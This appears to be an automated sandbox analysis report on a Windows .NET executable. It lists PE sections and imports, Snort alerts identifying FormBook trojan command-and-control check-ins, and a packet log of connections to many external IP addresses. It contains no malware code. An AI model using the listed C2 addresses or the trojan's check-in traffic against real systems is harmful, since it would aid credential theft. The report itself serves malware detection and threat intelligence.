                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xac1ca0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x5f8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xaae000x3608
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xaa0a40x70.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xaa2240xaa40062b7b6e430d319f902493cd06cdd7c77False0.9204194773311307data7.915293858213766IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xae0000x5f80x60028f3957deb2dc9b71aa7236377038542False0.4375data4.27462971891555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xb00000xc0x200d15ac267d03c5d77d0748c8ce79ac41eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xae0900x368data0.4208715596330275
                                              RT_MANIFEST0xae4080x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              07/01/24-16:16:13.746309TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.5109.123.121.243
                                              07/01/24-16:16:18.808053TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973180192.168.2.5109.123.121.243
                                              07/01/24-16:18:07.346515TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975980192.168.2.545.207.12.95
                                              07/01/24-16:17:15.863521TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974480192.168.2.5203.161.62.199
                                              07/01/24-16:18:21.028651TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976380192.168.2.581.95.96.29
                                              07/01/24-16:17:07.337585TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974280192.168.2.5121.254.178.238
                                              07/01/24-16:17:29.248940TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974880192.168.2.574.208.236.72
                                              07/01/24-16:18:28.632405TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976680192.168.2.581.95.96.29
                                              07/01/24-16:17:34.312062TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975080192.168.2.574.208.236.72
                                              07/01/24-16:19:16.252042TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977980192.168.2.531.186.11.254
                                              07/01/24-16:19:02.638028TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977580192.168.2.5192.227.175.142
                                              07/01/24-16:19:10.587031TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977880192.168.2.5192.227.175.142
                                              07/01/24-16:16:11.211715TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972780192.168.2.5109.123.121.243
                                              07/01/24-16:18:51.373471TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977280192.168.2.572.52.179.174
                                              07/01/24-16:16:24.966593TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973380192.168.2.547.242.109.15
                                              07/01/24-16:19:18.868394TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978080192.168.2.531.186.11.254
                                              07/01/24-16:18:37.901423TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976880192.168.2.5103.224.182.246
                                              07/01/24-16:17:02.095932TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.5121.254.178.238
                                              07/01/24-16:17:42.922320TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975280192.168.2.5192.207.62.21
                                              07/01/24-16:17:56.643054TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975680192.168.2.5199.59.243.226
                                              07/01/24-16:17:13.324881TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.5203.161.62.199
                                              07/01/24-16:15:49.808806TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972280192.168.2.5122.10.13.122
                                              07/01/24-16:18:56.437958TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977480192.168.2.572.52.179.174
                                              07/01/24-16:18:09.886069TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976080192.168.2.545.207.12.95
                                              07/01/24-16:19:05.500678TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977680192.168.2.5192.227.175.142
                                              07/01/24-16:18:01.702274TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975880192.168.2.5199.59.243.226
                                              07/01/24-16:17:54.095976TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975580192.168.2.5199.59.243.226
                                              07/01/24-16:18:14.951993TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976280192.168.2.545.207.12.95
                                              07/01/24-16:17:40.379960TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.5192.207.62.21
                                              07/01/24-16:18:23.559109TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976480192.168.2.581.95.96.29
                                              07/01/24-16:18:48.836010TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977180192.168.2.572.52.179.174
                                              07/01/24-16:16:27.495389TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973480192.168.2.547.242.109.15
                                              07/01/24-16:17:47.997961TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975480192.168.2.5192.207.62.21
                                              07/01/24-16:18:35.366412TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976780192.168.2.5103.224.182.246
                                              07/01/24-16:17:26.707967TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.574.208.236.72
                                              07/01/24-16:17:20.934301TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974680192.168.2.5203.161.62.199
                                              07/01/24-16:18:43.039994TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977080192.168.2.5103.224.182.246
                                              07/01/24-16:16:32.561088TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973780192.168.2.547.242.109.15
                                              07/01/24-16:16:59.555818TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973980192.168.2.5121.254.178.238

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 1, 2024 16:15:49.801100969 CEST4972280192.168.2.5122.10.13.122
                                              Jul 1, 2024 16:15:49.806052923 CEST8049722122.10.13.122192.168.2.5
                                              Jul 1, 2024 16:15:49.806166887 CEST4972280192.168.2.5122.10.13.122
                                              Jul 1, 2024 16:15:49.808805943 CEST4972280192.168.2.5122.10.13.122
                                              Jul 1, 2024 16:15:49.813570976 CEST8049722122.10.13.122192.168.2.5
                                              Jul 1, 2024 16:16:06.168265104 CEST8049722122.10.13.122192.168.2.5
                                              Jul 1, 2024 16:16:06.169558048 CEST8049722122.10.13.122192.168.2.5
                                              Jul 1, 2024 16:16:06.169667959 CEST4972280192.168.2.5122.10.13.122
                                              Jul 1, 2024 16:16:06.172209978 CEST4972280192.168.2.5122.10.13.122
                                              Jul 1, 2024 16:16:06.177064896 CEST8049722122.10.13.122192.168.2.5
                                              Jul 1, 2024 16:16:11.204627037 CEST4972780192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:11.209522963 CEST8049727109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:11.209707975 CEST4972780192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:11.211714983 CEST4972780192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:11.216464996 CEST8049727109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:11.813142061 CEST8049727109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:11.813637972 CEST8049727109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:11.813721895 CEST4972780192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:12.719608068 CEST4972780192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:13.738719940 CEST4972880192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:13.743633032 CEST8049728109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:13.743733883 CEST4972880192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:13.746309042 CEST4972880192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:13.751147032 CEST8049728109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:15.250833035 CEST4972880192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:15.297367096 CEST8049728109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:16.269953966 CEST4972980192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:16.274986029 CEST8049729109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:16.275115013 CEST4972980192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:16.277179956 CEST4972980192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:16.282198906 CEST8049729109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:16.282289028 CEST8049729109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:16.870628119 CEST8049729109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:16.870698929 CEST8049729109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:16.870784044 CEST4972980192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:17.224020004 CEST8049728109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:17.224114895 CEST4972880192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:17.782025099 CEST4972980192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:18.801003933 CEST4973180192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:18.805890083 CEST8049731109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:18.805984974 CEST4973180192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:18.808053017 CEST4973180192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:18.812849045 CEST8049731109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:19.403414011 CEST8049731109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:19.403548956 CEST8049731109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:19.403877974 CEST4973180192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:19.406590939 CEST4973180192.168.2.5109.123.121.243
                                              Jul 1, 2024 16:16:19.411847115 CEST8049731109.123.121.243192.168.2.5
                                              Jul 1, 2024 16:16:24.959528923 CEST4973380192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:24.964363098 CEST804973347.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:24.964554071 CEST4973380192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:24.966593027 CEST4973380192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:24.971488953 CEST804973347.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:26.469655991 CEST4973380192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:26.517497063 CEST804973347.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:27.488358021 CEST4973480192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:27.493309021 CEST804973447.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:27.493407965 CEST4973480192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:27.495388985 CEST4973480192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:27.500241995 CEST804973447.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:29.000787973 CEST4973480192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:29.053796053 CEST804973447.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:30.020416021 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:30.025728941 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:30.025892019 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:30.028462887 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:30.033482075 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:30.035958052 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:31.531964064 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:31.581641912 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:32.551876068 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:32.558434010 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:32.558661938 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:32.561088085 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:32.565927029 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:46.342921972 CEST804973347.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:46.343034029 CEST4973380192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:48.875663996 CEST804973447.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:48.875719070 CEST4973480192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:51.408432961 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:51.408498049 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:53.970906973 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:53.974265099 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:53.978355885 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:53.983954906 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:59.548784018 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:16:59.553639889 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:16:59.553709984 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:16:59.555818081 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:16:59.561091900 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:00.505011082 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:00.505028963 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:00.505129099 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:01.063234091 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.083933115 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.090698004 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:02.092063904 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.095932007 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.100838900 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:03.025872946 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:03.025940895 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:03.026052952 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:03.610093117 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.630347013 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.636518002 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:04.638139009 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.641969919 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.646823883 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:04.646831036 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:05.573576927 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:05.573628902 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:05.573693037 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:06.143955946 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.162461042 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.334254980 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:07.334348917 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.337584972 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.342391968 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:08.265718937 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:08.265933990 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:08.266048908 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:08.269984961 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:08.274780989 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:13.317677975 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:13.322529078 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.322612047 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:13.324881077 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:13.329610109 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.934170961 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.934513092 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.936069965 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:14.830028057 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.856370926 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.861412048 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:15.861542940 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.863521099 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.868321896 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:16.489027023 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:16.489238977 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:16.489435911 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:17.375710011 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.394371986 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.399254084 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.400223970 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.403979063 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.408834934 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.409436941 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.997564077 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.998873949 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.998928070 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:19.910047054 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.926852942 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.931842089 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:20.931921005 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.934300900 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.939296007 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:21.528525114 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:21.530216932 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:21.530280113 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:21.531676054 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:21.537045002 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:26.697139978 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:26.702999115 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:26.703108072 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:26.707967043 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:26.715126991 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:27.231482983 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:27.231802940 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:27.231853962 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:28.219439030 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.240709066 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.245527029 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.245604992 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.248939991 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.256118059 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.779887915 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.780077934 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.780158043 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:30.750695944 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.769987106 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.775090933 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:31.775161982 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.777240038 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.782124043 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:31.782246113 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:32.310808897 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:32.310872078 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:32.312638044 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:33.281980991 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.304009914 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.309771061 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.309971094 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.312062025 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.316946030 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.878957987 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.879153013 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.879384995 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.882210016 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.887111902 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:40.355973959 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:40.372585058 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.376034021 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:40.379960060 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:40.385116100 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.961719990 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.961770058 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.961837053 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:41.891501904 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.911977053 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.916909933 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:42.920011044 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.922319889 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.927087069 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:43.529786110 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:43.529813051 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:43.529900074 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:44.438220978 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.458077908 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.463601112 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:45.463677883 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.466121912 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.471714020 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:45.471998930 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:46.124095917 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:46.124135017 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:46.126188040 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:46.969721079 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:47.990847111 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:47.995851994 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:47.997961044 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:47.997961044 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.003443003 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:48.596379042 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:48.596417904 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:48.596596003 CEST8049754192.207.62.21192.168.2.5
